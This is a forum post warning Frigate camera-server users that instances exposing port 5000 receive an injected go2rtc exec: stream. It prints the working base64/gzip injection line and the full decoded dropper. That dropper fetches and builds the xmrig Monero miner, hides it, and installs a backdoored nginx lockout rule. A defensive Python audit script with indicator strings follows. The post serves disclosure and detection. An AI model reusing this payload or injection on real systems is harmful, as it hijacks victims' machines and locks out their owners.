#1
TLDR: Anyone exposing Frigate's port 5000 to the internet should upgrade to 0.17 beta 2 right away.
Keep in mind: don't expose anything to the internet, everything can be scanned. While Trư was wandering around the internet doing odds and ends, [he] found that Frigate instances in Vietnam that expose the open port (5000) instead of port 8971 (which has auth) get a piece of code injected into them to exec.
Example:
Code:
mqtt:
  host: 192.168.0.111
  topic_prefix: frigate
  client_id: frigate
  user: xxx
  password: xxx
  stats_interval: 60
go2rtc:
  streams:
    Aqara: rtsp://xxx
    debug: exec:/bin/bash -c 'base64 -d<<<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|zcat|sh'
  log: {}
cameras:
  Aqara:
    enabled: true
    ffmpeg:
      inputs:
        - path: ...
Decoding the base64 gives you a miner:
Code:
❯ echo "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" | base64 -d | zcat
ARCH=$(uname -m)
POOL0="mine.c3pool.com";
NODES=$(ls -d /sys/devices/system/node/node* 2>/dev/null | wc -l);
THREAD=$(( $(grep -c ^processor /proc/cpuinfo 2>/dev/null || echo 1) / 2 ));
HONAME=$(echo $(grep -m1 "model name" /proc/cpuinfo; hostname) | md5sum | cut -c1-8);
[ "$NODES" -le 0 ] && NODES=1;
KB=$(grep MemAvailable /proc/meminfo | tr -dc '0-9');
[ -z "$KB" ] && KB=0;
MB=$(( KB / 1024 ));
REQ=$(( NODES * 2300 ));
[ "$MB" -ge "$REQ" ] && MODE=fast || { [ "$MB" -ge $(( REQ / 2 )) ] && MODE=half; };
CNAME=$(grep -E "^model name|^Model" /proc/cpuinfo | cut -d ':' -f 2 | sed 's/^ //' | uniq);
H="afc92d79ab7a22aa48d8e30248042f7bca3cff7b9fa7cb359858ce11b7c89adf"
WA="47Ce53JfHMxhze2cTBCkn9G1bbHDWZHVYKNZccaKktr32bZVrCcJggQCSFYukkEoS9DvaYmzi313hJzkj9G8PZDT4x6HgS9";
A0="--cpu-priority=3 --donate-level=1 --threads=${THREAD:-2} --randomx-mode=${MODE:-light} --keepalive"
W0="--url ${POOL0}:15555 --coin monero --user ${WA} --pass ${HONAME:-None}"
W1="--url ${POOL0}:23333 --coin monero --user ${WA} --pass ${HONAME:-None}"
W2="--url ${POOL0}:443 --tls --coin monero --user ${WA} --pass ${HONAME:-None}"
W3="--url ${POOL0}:33333 --tls --coin monero --user ${WA} --pass ${HONAME:-None}"
ARGS="$A0 $W0 $W1 $W2 $W3 --background --print-time=60 --log-file=/tmp/.trace.log"
APT="curl apt-utils cmake build-essential libuv1-dev libssl-dev libhwloc-dev"
APK="util-linux build-base cmake libuv-dev openssl-dev hwloc-dev linux-headers"
MASTER="https://github.com/xmrig/xmrig/archive/refs/heads/master.tar.gz"
x86_64="https://github.com/xmrig/xmrig/releases/download/v6.25.0/xmrig-6.25.0-linux-static-x64.tar.gz"
DIR=$(for d in /config /opt/go2rtc /etc/go2rtc ~/.config/go2rtc; do [ -d "$d" ] && echo "$d" && break; done);
[ -z "$DIR" ] && DIR=$(pwd)
while pgrep -x apk > /dev/null; do sleep 5; done
while pgrep -x make > /dev/null; do sleep 5; done
while pgrep -x apt-get > /dev/null; do sleep 5; done
test ! -s $DIR/.trace && {
  echo 'nameserver 8.8.8.8' > /etc/resolv.conf
  echo 'nameserver 1.1.1.1' >> /etc/resolv.conf
  test -f /etc/alpine-release && {
    apk update --no-cache
    apk add --no-cache $APK xmrig
  }
  test -f /etc/debian_version && {
    apt-get update -y -qq 2>&1 | grep -v "configured multiple times" >&2
    apt-get install -y -qq --no-install-recommends $APT 2>&1 | grep -v "configured multiple times" >&2 && true || \
      (apt-get update --fix-missing && apt-get install -y --no-install-recommends $APT 2>&1 | grep -v "configured multiple times" >&2)
  }
  [ "$ARCH" = "x86_64" ] && {
    curl -sL $x86_64 -o /tmp/xmrig.tar.gz || exit 1
    mkdir -p /tmp/xmrig && tar -xzf /tmp/xmrig.tar.gz -C /tmp/xmrig --strip-components=1 > /dev/null 2>&1 || exit 1
    rm /tmp/xmrig.tar.gz > /dev/null || exit 1
    cp /tmp/xmrig/xmrig $DIR/.trace > /dev/null || exit 1
  } || {
    test ! -d /tmp/xmrig/src && {
      mkdir -p /tmp/xmrig > /dev/null || exit 1
      curl -sL $MASTER -o /tmp/xmrig.tar.gz || exit 1
      tar -xzf /tmp/xmrig.tar.gz -C /tmp/xmrig --strip-components=1 > /dev/null 2>&1 || exit 1
      rm /tmp/xmrig.tar.gz > /dev/null || exit 1
    }
    mkdir -p /tmp/xmrig/build > /dev/null || exit 1
    test ! -f /tmp/xmrig/build/Makefile && {
      /usr/bin/cmake -S /tmp/xmrig -B /tmp/xmrig/build > /dev/null || exit 1
    }
    /usr/bin/make -s -C /tmp/xmrig/build -j$(nproc) > /dev/null 2>/dev/null || exit 1
    cp /tmp/xmrig/build/xmrig $DIR/.trace > /dev/null || exit 1
  }
  chmod +x $DIR/.trace > /dev/null || exit 1
  pkill trace
}
ps w | grep "[/].trace" | grep -q "$POOL0" || pkill trace
pgrep -f "/.trace" > /dev/null || {
  >/tmp/req.log
  rm -rf /tmp/.trace.log
  test -f /etc/alpine-release && {
    apk update --no-cache
    apk add --no-cache libuv-dev openssl-dev hwloc-dev
  }
  test -f /etc/debian_version && {
    apt-get update -y -qq 2>&1 | grep -v "configured multiple times" >&2
    apt-get install -y -qq --no-install-recommends libuv1-dev libssl-dev libhwloc-dev 2>&1 | grep -v "configured multiple times" >&2
  }
  $DIR/.trace $ARGS &
  echo "$CNAME $THREAD" 1>&2
  sleep 5 && pgrep -x ".trace" && echo "Success $HONAME" 1>&2
}
grep -q "/api/config/save" /usr/local/nginx/conf/proxy.conf || (sed -i '1i if ($request_uri ~* "/api/config/save") { return 403; }' /usr/local/nginx/conf/proxy.conf && nginx -s reload)
grep -q "/tmp/req.log" /usr/local/nginx/conf/nginx.conf || (sed -i 's|access_log /dev/stdout main;|access_log /tmp/req.log main;|' /usr/local/nginx/conf/nginx.conf && nginx -s reload)
{
  while :; do
    A=$(tail -100 /tmp/req.log 2>/dev/null | grep -oP '\?auth=\K[^" ]+' | tail -1)
    [ -n "$A" ] && [ "$(echo "$A" | sha256sum | cut -d' ' -f1)" = "$H" ] && {
      sed -i '/\/api\/config\/save/d' /usr/local/nginx/conf/proxy.conf && nginx -s reload
      >/tmp/req.log
      sleep 60
      sed -i '1i if ($request_uri ~* "/api/config/save") { return 403; }' /usr/local/nginx/conf/proxy.conf && nginx -s reload
    }
    >/tmp/req.log
    sleep 10
  done
}&
Fixed in 0.17 beta 2: https://github.com/blakeblackshear/frigate/discussions/21593
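Added example for anyone who wants to check their own box (this is not code from the post, from Frigate or from go2rtc): a small Python audit that reads a Frigate config, pulls out every go2rtc `exec:` stream source, decodes an inline `base64 -d<<<… | zcat` payload the way the injected one above is built, and scores it against strings from the dropper (xmrig, monero, c3pool, the `/api/config/save` nginx rule, `.trace`). It also checks whether the dropper's "block everyone else's config saves" rule has been inserted into `proxy.conf`. The sample config, payload and proxy.conf are constructed for the demo; the real payload is the one decoded above.

```python
"""Audit a Frigate config + nginx proxy.conf for the go2rtc exec-source
miner injection. Added example, not Frigate's own code; sample inputs
below are constructed, not captured."""
import base64
import gzip
import re
import zlib

# Strings present in the decoded dropper; several hits = strong signal.
INDICATORS = (
    "xmrig", "monero", "--donate-level", "randomx", "c3pool",
    "/api/config/save", "/proc/cpuinfo", ".trace",
)

# go2rtc stream source written as `<name>: exec:<command>`
EXEC_SOURCE = re.compile(r"^\s*[\w-]+:\s*exec:(.+?)\s*$", re.MULTILINE)
# inline base64 handed to a decoder: `base64 -d<<<BLOB` or `echo BLOB | base64 -d`
INLINE_B64 = re.compile(
    r"base64\s+-d\s*<<<\s*['\"]?([A-Za-z0-9+/=]{40,})"
    r"|echo\s+['\"]?([A-Za-z0-9+/=]{40,})['\"]?\s*\|\s*base64\s+-d"
)
# the rule the dropper prepends to proxy.conf to lock out other config saves
LOCKOUT_RULE = re.compile(
    r'if\s*\(\$request_uri\s*~\*\s*"/api/config/save"\)\s*\{\s*return\s+403;'
)


def find_exec_sources(config_text):
    """Return every exec: stream command found in the YAML text."""
    return [m.group(1) for m in EXEC_SOURCE.finditer(config_text)]


def decode_inline_payload(command):
    """Decode (and gunzip, if gzip magic is present) a base64 blob embedded
    in the command. Returns the payload text, or None if there is none."""
    m = INLINE_B64.search(command)
    if not m:
        return None
    blob = m.group(1) or m.group(2)
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    if raw[:2] == b"\x1f\x8b":  # gzip magic: the `| zcat | sh` stage
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            return None
    return raw.decode("utf-8", errors="replace")


def match_indicators(text):
    """Indicator strings that occur in text, in INDICATORS order."""
    return [i for i in INDICATORS if i in text]


def audit_config(config_text):
    """One finding per exec: source: command, decoded payload, indicators.
    An exec: source is flagged if it hides an encoded payload at all, or
    if the command/payload contains any indicator."""
    findings = []
    for cmd in find_exec_sources(config_text):
        payload = decode_inline_payload(cmd)
        hits = match_indicators(cmd + (payload or ""))
        findings.append({
            "command": cmd, "decoded": payload, "indicators": hits,
            "suspicious": payload is not None or bool(hits),
        })
    return findings


def nginx_lockout_present(proxy_conf_text):
    """True if the dropper's 403 rule for /api/config/save is in proxy.conf."""
    return LOCKOUT_RULE.search(proxy_conf_text) is not None


# --- constructed sample input (stand-in for the real dropper above) ---
SAMPLE_DROPPER = (
    'POOL0="pool.example.invalid"\n'
    'curl -sL https://example.invalid/xmrig.tar.gz -o /tmp/x.tar.gz\n'
    "sed -i '1i if ($request_uri ~* \"/api/config/save\") { return 403; }' proxy.conf\n"
)
# mtime=0 keeps the blob deterministic between runs
SAMPLE_BLOB = base64.b64encode(gzip.compress(SAMPLE_DROPPER.encode(), mtime=0)).decode()
SAMPLE_CONFIG = f"""go2rtc:
  streams:
    Aqara: rtsp://user:pass@192.0.2.10/stream
    debug: exec:/bin/bash -c 'base64 -d<<<{SAMPLE_BLOB}|zcat|sh'
    doorbell: exec:ffmpeg -i rtsp://192.0.2.11/cam -c copy -f rtsp {{output}}
"""
SAMPLE_PROXY_CONF = (
    'if ($request_uri ~* "/api/config/save") { return 403; }\n'
    "location / { proxy_pass http://frigate; }\n"
)

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        tag = "SUSPICIOUS" if f["suspicious"] else "ok        "
        print(tag, f["command"][:60])
        if f["indicators"]:
            print("    indicators:", ", ".join(f["indicators"]))
    print("nginx lockout rule present:", nginx_lockout_present(SAMPLE_PROXY_CONF))
```

Point the same functions at the real `config.yml` (`/config/config.yml` in the container) and at `/usr/local/nginx/conf/proxy.conf`; a legitimate `exec:` source such as an ffmpeg pipe passes clean, while an inline base64/gzip blob is flagged before any indicator matching even runs.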